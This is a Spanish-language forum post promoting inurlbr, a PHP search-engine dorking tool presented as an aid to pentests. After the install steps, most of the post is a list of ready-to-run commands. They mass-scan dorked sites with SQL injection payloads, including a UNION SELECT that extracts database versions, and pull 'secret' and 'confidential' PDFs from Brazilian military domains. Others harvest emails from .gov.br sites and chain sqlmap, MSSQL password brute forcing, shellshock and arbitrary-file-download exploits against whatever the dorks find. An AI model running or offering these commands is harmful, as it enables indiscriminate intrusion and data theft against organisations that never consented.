Inurlbr: motor de búsqueda avanzado para pentests

Iniciado por ANTRAX, Mayo 25, 2017, 12:39:12 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Mayo 25, 2017, 12:39:12 PM Ultima modificación: Mayo 25, 2017, 12:46:44 PM por HATI
nurlbr es una herramienta en PHP que nos servirá como motor de búsqueda avanzado para la fase inicial de descubrimiento de un pentest o en un análisis de vulnerabilidades. Puede usar hasta 24 motores de búsqueda y 6 opciones especiales o deep web.

Esta herramienta permite aprovechar el poder de la información que ya está indexada por los motores de búsqueda y analizar un objetivo para cualquier posible intrusión.

Es capaz de extraer direcciones de correo electrónicos y URLs y valida cada petición examinando las respuestas HTTP. También soporta Tor para aleatorizar la IP y comandos externos para explotación: por ejemplo si encontramos una vulnerabilidad de inyección SQL, podríamos usar inurlbr para lanzar directamente sqlmap o cualquier otra herramienta a nuestra elección.

inurlbr funciona con la versión version **5.4.x** de [php](No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) en plataformas linux.

Para instalarlo podemos clonar el repositorio:

Código: text
git clone https://github.com/googleinurl/SCANNER-INURLBR.git inurlbr


Dar permisos de ejecución al script:

Código: bash
chmod +x inurlbr.php


E instalar las dependencias necesarias:

Código: bash
apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl


También es recomendable instalar tor:

Código: bash
apt-get install tor

(No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)

Permite un montón de parámetros por lo que te recomendamos que le eches un vistazo tranquilamente para ver todas las posibilidades:

Código: bash
./inurlbr.php –help | more



Para que os hagáis una idea y veáis un ejemplo de su uso, con el siguiente comando buscaremos sitios php que usen el parámetro id (dork 'inurl:php?id=') e inyectará en cada petición GET un pequeño payload (?´'%270×27;) para comprobar si es vulnerable a sql injection:

Código: text
./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"  



Por último alucinantes ejemplos

Código: text
./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"
./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'
./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'
./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'       
./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"
./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'
./inurlbr.php --dork 'new.php?id=' -s teste.txt  --exploit-get ?´0x27  --command-vul 'nmap sV -p 22,80,21 _TARGET_'
./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'
./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "_TARGETFULL_" --dbs'
./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'
./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1  --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m
./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u
./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id  1,2,6 
./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent  'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)'
./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id  1,2,6
./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id  1,2,6  --irc 'irc.rizon.net#inurlbrasil'   
./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_' 
./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4
./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?´'%270x27;"
./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a '<title>hello! admin</title>'
./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5
./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_' 
./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_' 
./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8 
./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8   --pr
./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8   --pr --shellshock
./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8  --sub-file 'xpls_Arbitrary_File_Download.txt' 


Espero que les sirva,
ANTRAX


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta